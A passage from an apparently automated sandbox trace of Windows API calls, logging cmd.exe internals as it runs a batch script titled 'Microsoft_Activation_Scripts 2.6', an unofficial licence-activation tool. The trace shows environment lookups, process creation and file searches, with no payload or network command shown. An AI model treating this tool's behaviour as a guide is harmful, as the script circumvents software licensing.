_MaxCount=0x7) returned 4 [0177.569] _wcsnicmp (_String1="COPYCMD", _String2="_cmdf=C", _MaxCount=0x7) returned 4 [0177.569] _wcsnicmp (_String1="COPYCMD", _String2="_Green=", _MaxCount=0x7) returned 4 [0177.569] _wcsnicmp (_String1="COPYCMD", _String2="_NCS=1", _MaxCount=0x7) returned 4 [0177.569] _wcsnicmp (_String1="COPYCMD", _String2="_PSarg=", _MaxCount=0x7) returned 4 [0177.569] _wcsnicmp (_String1="COPYCMD", _String2="_Red=\"4", _MaxCount=0x7) returned 4 [0177.569] _wcsnicmp (_String1="COPYCMD", _String2="_ttemp=", _MaxCount=0x7) returned 4 [0177.569] _wcsnicmp (_String1="COPYCMD", _String2="_White=", _MaxCount=0x7) returned 4 [0177.569] _wcsnicmp (_String1="COPYCMD", _String2="_work=C", _MaxCount=0x7) returned 4 [0177.569] _wcsnicmp (_String1="COPYCMD", _String2="_Yellow", _MaxCount=0x7) returned 4 [0177.570] GetProcessHeap () returned 0x19a8f1e0000 [0177.570] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f01e0) returned 1 [0177.570] GetProcessHeap () returned 0x19a8f1e0000 [0177.570] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x12) returned 0x19a8f1ecbe0 [0177.570] lstrcmpW (lpString1="\\cmd.exe", lpString2="\\XCOPY.EXE") returned -1 [0177.570] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo \"C:\\Windows\\Temp\\MAS_15344413.cmd\" \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\System32", lpStartupInfo=0x43f9efe8f0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo \"C:\\Windows\\Temp\\MAS_15344413.cmd\" \"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x43f9efe8d8 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo \"C:\\Windows\\Temp\\MAS_15344413.cmd\" \"", lpProcessInformation=0x43f9efe8d8*(hProcess=0x98, hThread=0xac, dwProcessId=0x13d8, dwThreadId=0x1344)) returned 1 [0177.584] CloseHandle (hObject=0xac) returned 1 [0177.584] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0177.584] GetProcessHeap () returned 0x19a8f1e0000 [0177.585] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2029e0) returned 1 [0177.585] GetEnvironmentStringsW () returned 0x19a8f20a9d0* [0177.585] GetProcessHeap () returned 0x19a8f1e0000 [0177.585] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfbe) returned 0x19a8f2029e0 [0177.585] memcpy (in: _Dst=0x19a8f2029e0, _Src=0x19a8f20a9d0, _Size=0xfbe | out: _Dst=0x19a8f2029e0) returned 0x19a8f2029e0 [0177.585] FreeEnvironmentStringsA (penv="=") returned 1 [0177.585] GetProcessHeap () returned 0x19a8f1e0000 [0177.585] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecbe0) returned 1 [0177.585] DeleteProcThreadAttributeList (in: lpAttributeList=0x43f9efe9d0 | out: lpAttributeList=0x43f9efe9d0) [0177.585] GetProcessHeap () returned 0x19a8f1e0000 [0177.586] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2069b0) returned 1 [0177.586] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.586] DuplicateHandle (in: hSourceProcessHandle=0x98, hSourceHandle=0x84, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0177.586] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0177.586] _close (_FileHandle=5) returned 0 [0177.586] _dup (_FileHandle=0) returned 4 [0177.586] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0177.586] _close (_FileHandle=3) returned 0 [0177.586] _wcsicmp (_String1="find", _String2="DIR") returned 2 [0177.586] _wcsicmp (_String1="find", _String2="ERASE") returned 1 [0177.586] _wcsicmp (_String1="find", _String2="DEL") returned 2 [0177.586] _wcsicmp (_String1="find", _String2="TYPE") returned -14 [0177.586] _wcsicmp (_String1="find", _String2="COPY") returned 3 [0177.586] _wcsicmp (_String1="find", _String2="CD") returned 3 [0177.587] _wcsicmp (_String1="find", _String2="CHDIR") returned 3 [0177.587] _wcsicmp (_String1="find", _String2="RENAME") returned -12 [0177.587] _wcsicmp (_String1="find", _String2="REN") returned -12 [0177.587] _wcsicmp (_String1="find", _String2="ECHO") returned 1 [0177.587] _wcsicmp (_String1="find", _String2="SET") returned -13 [0177.587] _wcsicmp (_String1="find", _String2="PAUSE") returned -10 [0177.587] _wcsicmp (_String1="find", _String2="DATE") returned 2 [0177.587] _wcsicmp (_String1="find", _String2="TIME") returned -14 [0177.587] _wcsicmp (_String1="find", _String2="PROMPT") returned -10 [0177.587] _wcsicmp (_String1="find", _String2="MD") returned -7 [0177.587] _wcsicmp (_String1="find", _String2="MKDIR") returned -7 [0177.587] _wcsicmp (_String1="find", _String2="RD") returned -12 [0177.587] _wcsicmp (_String1="find", _String2="RMDIR") returned -12 [0177.587] _wcsicmp (_String1="find", _String2="PATH") returned -10 [0177.587] _wcsicmp (_String1="find", _String2="GOTO") returned -1 [0177.587] _wcsicmp (_String1="find", _String2="SHIFT") returned -13 [0177.587] _wcsicmp (_String1="find", _String2="CLS") returned 3 [0177.587] _wcsicmp (_String1="find", _String2="CALL") returned 3 [0177.587] _wcsicmp (_String1="find", _String2="VERIFY") returned -16 [0177.587] _wcsicmp (_String1="find", _String2="VER") returned -16 [0177.587] _wcsicmp (_String1="find", _String2="VOL") returned -16 [0177.587] _wcsicmp (_String1="find", _String2="EXIT") returned 1 [0177.587] _wcsicmp (_String1="find", _String2="SETLOCAL") returned -13 [0177.587] _wcsicmp (_String1="find", _String2="ENDLOCAL") returned 1 [0177.588] _wcsicmp (_String1="find", _String2="TITLE") returned -14 [0177.588] _wcsicmp (_String1="find", _String2="START") returned -13 [0177.588] _wcsicmp (_String1="find", _String2="DPATH") returned 2 [0177.588] _wcsicmp (_String1="find", _String2="KEYS") returned -5 [0177.588] _wcsicmp (_String1="find", _String2="MOVE") returned -7 [0177.588] _wcsicmp (_String1="find", _String2="PUSHD") returned -10 [0177.588] _wcsicmp (_String1="find", _String2="POPD") returned -10 [0177.588] _wcsicmp (_String1="find", _String2="ASSOC") returned 5 [0177.588] _wcsicmp (_String1="find", _String2="FTYPE") returned -11 [0177.588] _wcsicmp (_String1="find", _String2="BREAK") returned 4 [0177.588] _wcsicmp (_String1="find", _String2="COLOR") returned 3 [0177.588] _wcsicmp (_String1="find", _String2="MKLINK") returned -7 [0177.588] _wcsicmp (_String1="find", _String2="DIR") returned 2 [0177.588] _wcsicmp (_String1="find", _String2="ERASE") returned 1 [0177.588] _wcsicmp (_String1="find", _String2="DEL") returned 2 [0177.588] _wcsicmp (_String1="find", _String2="TYPE") returned -14 [0177.588] _wcsicmp (_String1="find", _String2="COPY") returned 3 [0177.588] _wcsicmp (_String1="find", _String2="CD") returned 3 [0177.588] _wcsicmp (_String1="find", _String2="CHDIR") returned 3 [0177.588] _wcsicmp (_String1="find", _String2="RENAME") returned -12 [0177.588] _wcsicmp (_String1="find", _String2="REN") returned -12 [0177.588] _wcsicmp (_String1="find", _String2="ECHO") returned 1 [0177.588] _wcsicmp (_String1="find", _String2="SET") returned -13 [0177.588] _wcsicmp (_String1="find", _String2="PAUSE") returned -10 [0177.588] _wcsicmp (_String1="find", _String2="DATE") returned 2 [0177.588] _wcsicmp (_String1="find", _String2="TIME") returned -14 [0177.589] _wcsicmp (_String1="find", _String2="PROMPT") returned -10 [0177.589] _wcsicmp (_String1="find", _String2="MD") returned -7 [0177.589] _wcsicmp (_String1="find", _String2="MKDIR") returned -7 [0177.589] _wcsicmp (_String1="find", _String2="RD") returned -12 [0177.589] _wcsicmp (_String1="find", _String2="RMDIR") returned -12 [0177.589] _wcsicmp (_String1="find", _String2="PATH") returned -10 [0177.589] _wcsicmp (_String1="find", _String2="GOTO") returned -1 [0177.589] _wcsicmp (_String1="find", _String2="SHIFT") returned -13 [0177.589] _wcsicmp (_String1="find", _String2="CLS") returned 3 [0177.589] _wcsicmp (_String1="find", _String2="CALL") returned 3 [0177.589] _wcsicmp (_String1="find", _String2="VERIFY") returned -16 [0177.589] _wcsicmp (_String1="find", _String2="VER") returned -16 [0177.589] _wcsicmp (_String1="find", _String2="VOL") returned -16 [0177.589] _wcsicmp (_String1="find", _String2="EXIT") returned 1 [0177.589] _wcsicmp (_String1="find", _String2="SETLOCAL") returned -13 [0177.589] _wcsicmp (_String1="find", _String2="ENDLOCAL") returned 1 [0177.589] _wcsicmp (_String1="find", _String2="TITLE") returned -14 [0177.589] _wcsicmp (_String1="find", _String2="START") returned -13 [0177.589] _wcsicmp (_String1="find", _String2="DPATH") returned 2 [0177.589] _wcsicmp (_String1="find", _String2="KEYS") returned -5 [0177.589] _wcsicmp (_String1="find", _String2="MOVE") returned -7 [0177.589] _wcsicmp (_String1="find", _String2="PUSHD") returned -10 [0177.589] _wcsicmp (_String1="find", _String2="POPD") returned -10 [0177.589] _wcsicmp (_String1="find", _String2="ASSOC") returned 5 [0177.589] _wcsicmp (_String1="find", _String2="FTYPE") returned -11 [0177.590] _wcsicmp (_String1="find", _String2="BREAK") returned 4 [0177.590] _wcsicmp (_String1="find", _String2="COLOR") returned 3 [0177.590] _wcsicmp (_String1="find", _String2="MKLINK") returned -7 [0177.590] _wcsicmp (_String1="find", _String2="FOR") returned -6 [0177.590] _wcsicmp (_String1="find", _String2="IF") returned -3 [0177.590] _wcsicmp (_String1="find", _String2="REM") returned -12 [0177.590] GetProcessHeap () returned 0x19a8f1e0000 [0177.590] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0177.590] GetProcessHeap () returned 0x19a8f1e0000 [0177.590] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f2069b0 [0177.590] GetProcessHeap () returned 0x19a8f1e0000 [0177.590] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1e) returned 0x19a8f1efbe0 [0177.590] GetEnvironmentVariableW (in: lpName="_ttemp", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x28 [0177.590] GetProcessHeap () returned 0x19a8f1e0000 [0177.590] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1efbe0) returned 1 [0177.590] GetProcessHeap () returned 0x19a8f1e0000 [0177.591] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2069b0) returned 1 [0177.591] GetProcessHeap () returned 0x19a8f1e0000 [0177.591] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f20d9b0, Size=0x198) returned 0x19a8f20d9b0 [0177.591] GetProcessHeap () returned 0x19a8f1e0000 [0177.591] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f20d9b0) returned 0x198 [0177.591] GetProcessHeap () returned 0x19a8f1e0000 [0177.591] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20db60 [0177.591] _wcsicmp (_String1="find", _String2="DIR") returned 2 [0177.591] _wcsicmp (_String1="find", _String2="ERASE") returned 1 [0177.591] _wcsicmp (_String1="find", _String2="DEL") returned 2 [0177.591] _wcsicmp (_String1="find", _String2="TYPE") returned -14 [0177.591] _wcsicmp (_String1="find", _String2="COPY") returned 3 [0177.592] _wcsicmp (_String1="find", _String2="CD") returned 3 [0177.592] _wcsicmp (_String1="find", _String2="CHDIR") returned 3 [0177.592] _wcsicmp (_String1="find", _String2="RENAME") returned -12 [0177.592] _wcsicmp (_String1="find", _String2="REN") returned -12 [0177.592] _wcsicmp (_String1="find", _String2="ECHO") returned 1 [0177.592] _wcsicmp (_String1="find", _String2="SET") returned -13 [0177.592] _wcsicmp (_String1="find", _String2="PAUSE") returned -10 [0177.592] _wcsicmp (_String1="find", _String2="DATE") returned 2 [0177.592] _wcsicmp (_String1="find", _String2="TIME") returned -14 [0177.592] _wcsicmp (_String1="find", _String2="PROMPT") returned -10 [0177.592] _wcsicmp (_String1="find", _String2="MD") returned -7 [0177.592] _wcsicmp (_String1="find", _String2="MKDIR") returned -7 [0177.592] _wcsicmp (_String1="find", _String2="RD") returned -12 [0177.592] _wcsicmp (_String1="find", _String2="RMDIR") returned -12 [0177.592] _wcsicmp (_String1="find", _String2="PATH") returned -10 [0177.592] _wcsicmp (_String1="find", _String2="GOTO") returned -1 [0177.592] _wcsicmp (_String1="find", _String2="SHIFT") returned -13 [0177.592] _wcsicmp (_String1="find", _String2="CLS") returned 3 [0177.592] _wcsicmp (_String1="find", _String2="CALL") returned 3 [0177.592] _wcsicmp (_String1="find", _String2="VERIFY") returned -16 [0177.592] _wcsicmp (_String1="find", _String2="VER") returned -16 [0177.592] _wcsicmp (_String1="find", _String2="VOL") returned -16 [0177.592] _wcsicmp (_String1="find", _String2="EXIT") returned 1 [0177.592] _wcsicmp (_String1="find", _String2="SETLOCAL") returned -13 [0177.592] _wcsicmp (_String1="find", _String2="ENDLOCAL") returned 1 [0177.592] _wcsicmp (_String1="find", _String2="TITLE") returned -14 [0177.593] _wcsicmp (_String1="find", _String2="START") returned -13 [0177.593] _wcsicmp (_String1="find", _String2="DPATH") returned 2 [0177.593] _wcsicmp (_String1="find", _String2="KEYS") returned -5 [0177.593] _wcsicmp (_String1="find", _String2="MOVE") returned -7 [0177.593] _wcsicmp (_String1="find", _String2="PUSHD") returned -10 [0177.593] _wcsicmp (_String1="find", _String2="POPD") returned -10 [0177.593] _wcsicmp (_String1="find", _String2="ASSOC") returned 5 [0177.593] _wcsicmp (_String1="find", _String2="FTYPE") returned -11 [0177.593] _wcsicmp (_String1="find", _String2="BREAK") returned 4 [0177.593] _wcsicmp (_String1="find", _String2="COLOR") returned 3 [0177.593] _wcsicmp (_String1="find", _String2="MKLINK") returned -7 [0177.593] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0177.593] GetProcessHeap () returned 0x19a8f1e0000 [0177.593] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x420) returned 0x19a8f211b80 [0177.593] SetErrorMode (uMode=0x0) returned 0x0 [0177.593] SetErrorMode (uMode=0x1) returned 0x0 [0177.593] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x19a8f211b90, lpFilePart=0x43f9efea40 | out: lpBuffer="C:\\Windows\\System32", lpFilePart=0x43f9efea40*="System32") returned 0x13 [0177.593] SetErrorMode (uMode=0x0) returned 0x1 [0177.593] GetProcessHeap () returned 0x19a8f1e0000 [0177.594] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f211b80, Size=0x42) returned 0x19a8f211b80 [0177.594] GetProcessHeap () returned 0x19a8f1e0000 [0177.594] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f211b80) returned 0x42 [0177.594] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0177.594] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0177.594] GetProcessHeap () returned 0x19a8f1e0000 [0177.594] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xee) returned 0x19a8f1fbef0 [0177.594] GetProcessHeap () returned 0x19a8f1e0000 [0177.594] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1cc) returned 0x19a8f1f0370 [0177.594] GetProcessHeap () returned 0x19a8f1e0000 [0177.594] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f0370, Size=0xf0) returned 0x19a8f1f0370 [0177.594] GetProcessHeap () returned 0x19a8f1e0000 [0177.594] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f0370) returned 0xf0 [0177.594] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0177.594] GetProcessHeap () returned 0x19a8f1e0000 [0177.594] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfc) returned 0x19a8f1eac60 [0177.594] GetProcessHeap () returned 0x19a8f1e0000 [0177.594] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eac60, Size=0x88) returned 0x19a8f1eac60 [0177.594] GetProcessHeap () returned 0x19a8f1e0000 [0177.594] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eac60) returned 0x88 [0177.594] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0177.595] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.*" (normalized: "c:\\windows\\system32\\find.*"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe7c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe7c0) returned 0x19a8f1f8b20 [0177.595] FindClose (in: hFindFile=0x19a8f1f8b20 | out: hFindFile=0x19a8f1f8b20) returned 1 [0177.595] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.COM" (normalized: "c:\\windows\\system32\\find.com"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe7c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe7c0) returned 0xffffffffffffffff [0177.595] GetLastError () returned 0x2 [0177.595] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.EXE" (normalized: "c:\\windows\\system32\\find.exe"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe7c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe7c0) returned 0x19a8f1f8700 [0177.596] FindClose (in: hFindFile=0x19a8f1f8700 | out: hFindFile=0x19a8f1f8700) returned 1 [0177.596] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0177.596] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0177.596] GetProcessHeap () returned 0x19a8f1e0000 [0177.596] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1effd0 [0177.596] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.596] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.596] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.596] GetFileType (hFile=0x24) returned 0x2 [0177.596] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0177.596] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efea78 | out: lpMode=0x43f9efea78) returned 1 [0177.597] _dup (_FileHandle=1) returned 3 [0177.597] _close (_FileHandle=1) returned 0 [0177.597] _wcsicmp (_String1="nul", _String2="con") returned 11 [0177.597] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x43f9efea10, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24 [0177.597] _open_osfhandle (_OSFileHandle=0x24, _Flags=8) returned 1 [0177.597] GetProcessHeap () returned 0x19a8f1e0000 [0177.597] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x218) returned 0x19a8f20d150 [0177.597] GetProcessHeap () returned 0x19a8f1e0000 [0177.597] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x7c) returned 0x19a8f1ead00 [0177.597] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0177.597] GetProcessHeap () returned 0x19a8f1e0000 [0177.597] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x420) returned 0x19a8f200e40 [0177.597] SetErrorMode (uMode=0x0) returned 0x0 [0177.597] SetErrorMode (uMode=0x1) returned 0x0 [0177.597] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x19a8f200e50, lpFilePart=0x43f9efe7d0 | out: lpBuffer="C:\\Windows\\System32", lpFilePart=0x43f9efe7d0*="System32") returned 0x13 [0177.598] SetErrorMode (uMode=0x0) returned 0x1 [0177.598] GetProcessHeap () returned 0x19a8f1e0000 [0177.598] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f200e40, Size=0x42) returned 0x19a8f200e40 [0177.598] GetProcessHeap () returned 0x19a8f1e0000 [0177.598] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f200e40) returned 0x42 [0177.598] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0177.598] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0177.598] GetProcessHeap () returned 0x19a8f1e0000 [0177.598] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xee) returned 0x19a8f1fb8f0 [0177.598] GetProcessHeap () returned 0x19a8f1e0000 [0177.598] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1cc) returned 0x19a8f1e5e10 [0177.598] GetProcessHeap () returned 0x19a8f1e0000 [0177.598] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e5e10, Size=0xf0) returned 0x19a8f1e5e10 [0177.598] GetProcessHeap () returned 0x19a8f1e0000 [0177.598] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e5e10) returned 0xf0 [0177.598] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0177.598] GetProcessHeap () returned 0x19a8f1e0000 [0177.598] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfc) returned 0x19a8f1e5f10 [0177.598] GetProcessHeap () returned 0x19a8f1e0000 [0177.598] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e5f10, Size=0x88) returned 0x19a8f1e5f10 [0177.598] GetProcessHeap () returned 0x19a8f1e0000 [0177.598] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e5f10) returned 0x88 [0177.598] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0177.599] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.*" (normalized: "c:\\windows\\system32\\find.*"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe550, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe550) returned 0x19a8f1f8820 [0177.599] FindClose (in: hFindFile=0x19a8f1f8820 | out: hFindFile=0x19a8f1f8820) returned 1 [0177.599] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.COM" (normalized: "c:\\windows\\system32\\find.com"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe550, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe550) returned 0xffffffffffffffff [0177.599] GetLastError () returned 0x2 [0177.599] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.EXE" (normalized: "c:\\windows\\system32\\find.exe"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe550, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe550) returned 0x19a8f1f8a60 [0177.599] FindClose (in: hFindFile=0x19a8f1f8a60 | out: hFindFile=0x19a8f1f8a60) returned 1 [0177.600] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0177.600] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0177.600] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efeab0, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.600] InitializeProcThreadAttributeList (in: lpAttributeList=0x43f9efe9d0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x43f9efe8d0 | out: lpAttributeList=0x43f9efe9d0, lpSize=0x43f9efe8d0) returned 1 [0177.600] UpdateProcThreadAttribute (in: lpAttributeList=0x43f9efe9d0, dwFlags=0x0, Attribute=0x60001, lpValue=0x43f9efe8bc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x43f9efe9d0, lpPreviousValue=0x0) returned 1 [0177.600] GetStartupInfoW (in: lpStartupInfo=0x43f9efe960 | out: lpStartupInfo=0x43f9efe960*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0177.600] GetProcessHeap () returned 0x19a8f1e0000 [0177.601] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1efe50 [0177.601] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0177.601] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0177.601] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0177.601] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0177.601] _wcsnicmp (_String1="COPYCMD", _String2="Black=\"", _MaxCount=0x7) returned 1 [0177.601] _wcsnicmp (_String1="COPYCMD", _String2="Blue=\"4", _MaxCount=0x7) returned 1 [0177.601] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0177.601] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0177.601] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0177.601] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0177.601] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0177.601] _wcsnicmp (_String1="COPYCMD", _String2="eline=e", _MaxCount=0x7) returned -2 [0177.601] _wcsnicmp (_String1="COPYCMD", _String2="esc=\x1b", _MaxCount=0x7) returned -2 [0177.601] _wcsnicmp (_String1="COPYCMD", _String2="Gray=\"1", _MaxCount=0x7) returned -4 [0177.601] _wcsnicmp (_String1="COPYCMD", _String2="Green=\"", _MaxCount=0x7) returned -4 [0177.601] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0177.601] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0177.601] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0177.601] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0177.601] _wcsnicmp (_String1="COPYCMD", _String2="Magenta", _MaxCount=0x7) returned -10 [0177.601] _wcsnicmp (_String1="COPYCMD", _String2="mas=htt", _MaxCount=0x7) returned -10 [0177.601] _wcsnicmp (_String1="COPYCMD", _String2="masver=", _MaxCount=0x7) returned -10 [0177.601] _wcsnicmp (_String1="COPYCMD", _String2="nceline", _MaxCount=0x7) returned -11 [0177.602] _wcsnicmp (_String1="COPYCMD", _String2="nul=>nu", _MaxCount=0x7) returned -11 [0177.602] _wcsnicmp (_String1="COPYCMD", _String2="nul1=1>", _MaxCount=0x7) returned -11 [0177.602] _wcsnicmp (_String1="COPYCMD", _String2="nul2=2>", _MaxCount=0x7) returned -11 [0177.602] _wcsnicmp (_String1="COPYCMD", _String2="nul6=2^", _MaxCount=0x7) returned -11 [0177.602] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0177.602] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0177.602] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0177.602] _wcsnicmp (_String1="COPYCMD", 